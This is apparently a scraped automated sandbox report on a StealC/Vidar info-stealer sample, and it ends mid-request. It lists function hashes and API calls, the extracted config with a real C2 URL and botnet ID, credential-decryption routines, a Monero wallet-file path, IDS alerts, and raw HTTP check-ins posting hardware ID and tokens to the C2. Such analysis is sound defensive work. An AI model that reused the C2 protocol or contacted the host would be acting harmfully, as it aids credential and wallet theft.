Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: a190006255e28b5e30bbb4bcef3f35bc8e1739a7f279523bd1ae9a58b196a581
Instruction ID: 1be68a65a709407f6b710357f324fd4f215f2213f5a15ab702c8dd93dcd06fd3
Opcode Fuzzy Hash: a190006255e28b5e30bbb4bcef3f35bc8e1739a7f279523bd1ae9a58b196a581
Instruction Fuzzy Hash: 78E08CB0A40209BFD700DF94DC0AE6977B8EB05702F000094FD0997280DA759E08EB92

Function 0036D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 00378B60: GetSystemTime.KERNEL32(00380E1A,0114A480,003805AE,?,?,003613F9,?,0000001A,00380E1A,00000000,?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 00378B86

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D481
lstrlen.KERNEL32(00000000), ref: 0036D698
lstrlen.KERNEL32(00000000), ref: 0036D6AC
DeleteFileA.KERNEL32(00000000), ref: 0036D72B

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 353b2778981f65d517d68855d603836390766a565c75e29ad2e71ba93162db7b
Instruction ID: b48a1571c6029ef0a8c28494b9ae3696f837394e3e84646fa3d9421b8c4628ca
Opcode Fuzzy Hash: 353b2778981f65d517d68855d603836390766a565c75e29ad2e71ba93162db7b
Instruction Fuzzy Hash: F7911471910508ABCB16FBA4DC96DEE7738AF94300F50C168F51B7A091EF386A09DB63

Function 00373560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: ff8e87ce7229607e6d2762e8ba7bc38bb0167ffd7a22957aaa3450e601cdcb41
Instruction ID: cf800276e2390396229864c72fc7b1a29e64fcdd0a8a218dadb339353873a655
Opcode Fuzzy Hash: ff8e87ce7229607e6d2762e8ba7bc38bb0167ffd7a22957aaa3450e601cdcb41
Instruction Fuzzy Hash: 4C412571D10209AFCB16EFE4D885AFE7778AF54304F00C418E51977251DB796A09DF92

Function 003794D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 003794EB

Part of subcall function 00378D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0037951E,00000000), ref: 00378D5B
Part of subcall function 00378D50: RtlAllocateHeap.NTDLL(00000000), ref: 00378D62
Part of subcall function 00378D50: wsprintfW.USER32 ref: 00378D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 003795AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 003795C9
CloseHandle.KERNEL32(00000000), ref: 003795D6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 8485d4c466662d62317d12c2ea0da0875d4ad100be055aef90211c6d3b93bb1d
Instruction ID: 63ae49674118ca617ffa96a0589b24ce1c869e1658bd84a7c65752af5d171157
Opcode Fuzzy Hash: 8485d4c466662d62317d12c2ea0da0875d4ad100be055aef90211c6d3b93bb1d
Instruction Fuzzy Hash: B9314D71E0021CAFDB25DFE0CC49BEDB778EB55300F108559E50AAF184DB78AA89DB52

Function 00377980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380E00,00000000,?), ref: 003779B0
RtlAllocateHeap.NTDLL(00000000), ref: 003779B7
GetLocalTime.KERNEL32(?,?,?,?,?,00380E00,00000000,?), ref: 003779C4
wsprintfA.USER32 ref: 003779F3

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 656c7fdd0b846fbd398c229731af6b2ed8cd85114edd09db368d4ec58c511c05
Instruction ID: 519230a310d3b318f141d8c6abfa566e58d3368a4be8c9c46aa168379f2a925c
Opcode Fuzzy Hash: 656c7fdd0b846fbd398c229731af6b2ed8cd85114edd09db368d4ec58c511c05
Instruction Fuzzy Hash: 651112B2904119AACB149FCADD45BBEBBF8EB49B11F10421AF605A2280E33D5944DBB1

Function 0037C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0037C74E

Part of subcall function 0037BF9F: __amsg_exit.LIBCMT ref: 0037BFAF

__getptd.LIBCMT ref: 0037C765
__amsg_exit.LIBCMT ref: 0037C773
__updatetlocinfoEx_nolock.LIBCMT ref: 0037C797

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: ae66616961d6380936cb52325ed7ce784fe838076e46818f2e34c13d52a7264c
Instruction ID: fbdb4051294278877a502a1fad3ef8c84d39d7c607103f484e37689cc22bb32e
Opcode Fuzzy Hash: ae66616961d6380936cb52325ed7ce784fe838076e46818f2e34c13d52a7264c
Instruction Fuzzy Hash: 7FF06732910B009FD73BBBB89846B4EB3A06F00B20F25D18DF40CAA2D2CF6C59409F56

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpser	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	URL Reputation: Label: malware

Source: 0.2.file.exe.360000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.360000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00369B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00369B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0036C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00367240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00367240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00369AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00369AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00378EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00378EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 31 43 37 38 31 37 38 38 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="hwid"41C7817882D72284582127------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build"doma------FCFBFHIEBKJKFHIEBFBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="message"browsers------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; 